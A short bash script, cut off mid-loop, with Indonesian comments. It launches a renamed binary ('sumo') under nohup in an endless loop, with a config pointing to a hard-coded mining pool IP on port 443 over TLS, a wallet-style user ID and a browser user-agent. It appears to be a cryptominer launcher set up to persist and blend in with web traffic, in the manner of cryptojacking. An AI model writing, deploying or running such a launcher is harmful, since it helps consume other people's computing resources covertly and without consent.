#!/usr/bin/env bash

# Base folder
BASE_DIR="./sumo_dir"
mkdir -p "$BASE_DIR"

# Copy binary
cp ./sumo "$BASE_DIR/sumo" 2>/dev/null || true
chmod +x "$BASE_DIR/sumo" 2>/dev/null

# Masuk ke folder
cd "$BASE_DIR" || exit 1

# Buat config.json
cat > config.json <<EOF
{
  "pools": [{
    "url": "128.199.191.7:443",
    "user": "v2df0zlb7dqvmbpr3uq7jbeaucbijily6cgcpl0ckswlh",
    "pass": "system",
    "tls": true
  }],
  "threads": 4,
  "user-agent": "Mozilla/5.0"
}
EOF

while true; do
  # Jalankan 
  nohup ./sumo --config=config.json 
